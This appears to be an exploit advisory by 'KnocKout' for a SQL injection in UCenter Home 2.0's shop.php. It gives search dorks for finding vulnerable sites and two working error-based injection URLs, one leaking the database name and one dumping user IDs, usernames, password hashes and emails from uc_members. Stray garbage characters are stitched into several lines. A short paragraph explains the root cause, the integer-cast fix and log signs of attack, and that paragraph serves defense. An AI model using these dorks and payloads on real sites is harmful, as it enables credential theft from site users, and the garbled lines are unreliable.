__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
Vuln file : Shop.php
Parameters : (?)ac=view&shopid=
Vulnerability type : SQL Injection (MySQL Error Based)
Root cause (inferred from the request format; the advisory does not show the source of shop.php) : the shopid value is used in a MySQL query without being restricted to an integer. Casting shopid to an integer or binding it as a query parameter closes the injection; hiding MySQL error output only removes the error-based channel and leaves the injection in place. In web server logs, shop.php requests whose shopid is not purely numeric, in particular ones containing information_schema or floor(rand(0)*2), indicate attempts against this parameter.
Needed materials : Hex Conversion
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
You need the victim database name.
! k3 P0 @4 E3 Tfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 1 X% E" h; K. T1 q/ c! g
..
DB : Okay.
Edit the DB name : `[TARGET DB NAME]`
Example : 'hiwir1_ucenter'
Edit : Okay.
Use hex conversion, and edit your SQL injection exploit.
8 U2 H3 J. i7 x# } ?7 y) Q0 _Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 ; v1 U5 Q4 P: W# Y! \- h